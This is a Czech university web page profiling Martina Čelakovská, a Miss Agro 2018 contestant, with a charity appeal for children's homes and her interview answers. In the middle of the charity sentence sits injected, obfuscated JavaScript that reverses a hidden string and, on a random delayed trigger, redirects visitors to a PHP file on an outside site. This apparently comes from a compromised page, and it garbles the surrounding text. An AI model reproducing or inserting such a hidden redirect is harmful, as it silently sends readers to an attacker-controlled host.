Martina Čelakovská

Profil

Fakulta: FTZ
Obor: Zemědělství tropů a subtropů (ZTS)
Ročník: 3.
Věk:
22

Možná jste už na kampusu zahlédli tu holku v pestrobarevném africkém oblečení, s karibskými copánky a květinami na hlavě anebo se skupinou cizinců z celého světa? Tak to je Martina, taková hodně mezinárodní a trochu netypická Češka. Hodně cestuje a kromě angličtiny mluví francouzsky, španělsky a portugalsky. Nově se učí italsky a pro legraci základ papiamenta. Svůj volný čas kromě tance věnuje hlavně cizincům v ČR a snaze otevřít lidem oči ve vztahu k ostatním s heslem: „I am NOT a label!“

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2018?

Ráda ukazuju lidem, že existuje víc, než jen černobílý svět; existuje jak spousta barev, tak stylů, možností, lidí a míst. Bojíme se neznámého, jiného a změn, a lidé proto rádi jdou s davem. Chtěla bych každého člověka povzbudit, aby se nebál být sám sebou, objevovat a zkoušet; ať už mu pak říkají „bláznivej“ nebo jakkoliv jinak. Jak řekl už Seneca: „Žádný velký duch není bez trošky bláznovství.“ Myslím si, že Miss by měla mít nějaký takový cíl/ideu, co chce předat ostatním.

Kdyby ses mohla narodit ještě jednou, kým bys chtěla být?

„Všechno jde, když se chce.“ – No, až na zkoušky. (smích) Ale jsem spokojená s tím, kam jsem v životě chtěla a povedlo se mi dojít; takže bych za cizí neměnila. Jen bych se ráda byla narodila na jiném kontinentě, kde jsou lidi ještě solidární, srdeční a vděční a nepotřebují ke všemu mobil. Věřte, jsou fakt šťastnější. Konkrétně – v nějakém africkém hlavním městě, nebo brazilském předměstí.

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

Když jsem viděla obor „tropické zeměd…“, neváhala jsem. Kde je tropické, jsem taky já. Nejlepší jsou pro mě jednoznačně multikulturalita a mezinárodnost našeho kampusu, myslím si, že to je velmi výjimečné.

Přihlásila ses do Miss Agro sama nebo Tě přihlásil někdo jiný?

Sama. Chtěla jsem vidět, jak daleko se „ten exot“ jako já může dostat. Od prváku mi kamarádi říkali, že už jsem tam měla jít. Ale až po 3 letech jsem den před uzávěrkou přihlášek sebrala kuráž.